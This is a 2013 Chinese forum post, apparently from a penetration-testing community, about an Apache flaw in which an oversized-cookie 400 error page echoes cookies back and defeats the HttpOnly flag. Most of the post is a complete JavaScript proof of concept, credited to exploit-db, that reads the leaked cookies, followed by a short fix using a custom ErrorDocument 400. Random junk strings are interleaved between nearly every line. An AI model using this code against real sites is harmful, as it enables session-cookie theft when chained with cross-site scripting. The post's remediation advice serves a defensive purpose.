中国网络渗透测试联盟
标题:
Apache HttpOnly Cookie XSS跨站漏洞
[打印本页]
作者:
admin
时间:
2013-4-19 19:15
标题:
Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
+ y7 ?; [2 P! E: F( t
* L, e& N' y* w8 `5 v0 b) ]4 ~
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
' T: f7 L9 q, R+ }/ Y: u9 ^& l
1 x8 B' r' ]3 R* d
; W b; X: j: n& o1 N4 Q
//
http://www.exploit-db.com/exploits/18442/
& g2 B' y" O+ _/ N( z& a
function setCookies (good) {
# E3 K. e: y. W' J$ [) D8 a
// Construct string for cookie value
) @# F5 C f4 x
var str = "";
( F0 S9 o4 f& h8 g, I$ `. g
for (var i=0; i< 819; i++) {
* M) X3 B( {7 A, J
str += "x";
* q1 B1 }- ?7 x7 T+ B# p
}
1 U! w2 G4 {) W- e- v' J+ z! M
// Set cookies
" A) a* f8 a3 ]: c9 k" F5 C( H
for (i = 0; i < 10; i++) {
1 k; ` G- X; m: W
// Expire evil cookie
" O. `) k& }% N) v+ I
if (good) {
' q7 W+ a& D6 R# \9 m1 Y
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
2 s9 ~; w+ f2 S- z& b) a% f/ h
}
" k5 W0 ?! X. y$ m3 N" Y+ q
// Set evil cookie
$ b( \4 ]" E" T" ~' r
else {
- ~4 G- i6 m U2 g
var cookie = "xss"+i+"="+str+";path=/";
/ O+ S2 v! D+ B( \+ o, x5 \( E
}
" h( ?5 I t" U3 Q9 p
document.cookie = cookie;
; `8 {+ N3 H( Y4 p9 B
}
8 t; p X2 y1 x6 ?/ V* I0 X5 B: Z
}
6 u7 T1 x" Q. F# V( d
function makeRequest() {
% j2 E6 ?: Q, N( W
setCookies();
. G: x; ]4 X! E( {1 L
function parseCookies () {
' r1 m* S4 O6 u$ J- J3 b
var cookie_dict = {};
$ ]$ T: p* A9 b. s- _ ^
// Only react on 400 status
6 \& c) A4 l1 F6 p1 f
if (xhr.readyState === 4 && xhr.status === 400) {
1 ~" f: ^0 f: u8 U$ H1 W
// Replace newlines and match <pre> content
' O: v, \2 j- R3 I- }* a+ P
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
6 u9 T. D4 D. u" Z* d- L M
if (content.length) {
) }. C5 `" r9 x% @. {7 Q
// Remove Cookie: prefix
( s! q+ k% a+ o
content = content[1].replace("Cookie: ", "");
5 T" l* q3 D, k8 J* R% i
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
. ]9 v( m4 s) u6 n
// Add cookies to object
3 l* R9 N' u: W( W/ K; ?) d2 B0 V9 A
for (var i=0; i<cookies.length; i++) {
) E4 J3 I" \/ J' `
var s_c = cookies
.split('=',2);
8 J& i! v" N: D8 _. r: q
cookie_dict[s_c[0]] = s_c[1];
6 C) B |2 A9 O/ v2 y. n) K1 t
}
4 q1 X; [5 n' `: _6 W
}
& W2 M4 a9 T3 ^$ j
// Unset malicious cookies
' x5 V" c: ]9 S7 [9 B; s: ?- g2 M
setCookies(true);
, N5 }8 v6 n9 a- L
alert(JSON.stringify(cookie_dict));
g u( R% w. D8 i9 l8 M v4 i2 O/ o
}
* s& r9 S& U7 \+ `) W5 x9 @
}
8 x) U9 x0 i- I5 y
// Make XHR request
- \" W5 l6 P3 |, b; f' t* e
var xhr = new XMLHttpRequest();
+ p2 {3 S/ E6 Q5 Z& g7 {8 ]
xhr.onreadystatechange = parseCookies;
* v4 ^( t% s3 K' D3 n
xhr.open("GET", "/", true);
! C3 M$ u/ O6 B
xhr.send(null);
5 s& s2 _ {( Z
}
/ @7 i1 X6 f1 V- L4 e
makeRequest();
7 M9 p2 j( f% N5 E) o0 n
9 Q3 S: x' ^& b# @! h
你就能看见华丽丽的400错误包含着cookie信息。
- N# O# i* E8 u4 u+ Q, z U0 i; x
/ G+ [; K6 {( i) m5 e( ^
下载地址:
https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
* n6 N; r2 w; U" [6 A
1 N/ }0 Z* y! k9 Z) j4 a% l
修复方案:
1 B! q3 E9 d7 Z2 l5 v
4 b7 D9 C2 [4 W1 O) S+ {7 A
Apache官方提供4种错误处理方式(
http://httpd.apache.org/docs/2.0/mod/core.html#errordocument
),如下
0 |# t+ X$ K( q: u' Q- l
; {, Y T; P) y3 v# T
In the event of a problem or error, Apachecan be configured to do one of four things,
& L* F C, {3 X) T# U/ [
3 {. H4 [: f. J, p, C" U0 U
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. k6 }5 w& _! B% J. C
2. output acustomized message输出一段信息
- M& |! i; w% N
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
$ e. v4 ?) n2 _
4. redirect to an external URL to handle theproblem/error转向一个外部URL
" C( Q3 k( q* k. h
- G& x y) S% G' Y! C" @
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
6 j+ \6 k) W# Y# y0 _1 G$ c* f
; ^/ w# d# k, Z0 {% r, p
Apache配置:
6 R) d) t& N/ G$ I- [0 R6 X( f
4 T1 h6 [7 p( n7 y+ U( d4 i
ErrorDocument400 " security test"
3 I4 x. U9 V! m
& W1 {# r% w! n2 l) W' ^
当然,升级apache到最新也可:)。
S: b4 b' |* \* S z
/ l, g) M# Z. d5 `- J, d
参考:
http://httpd.apache.org/security/vulnerabilities_22.html
# i' T9 W, V* ]4 o3 j- F
7 N, U( D V4 H& i( q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2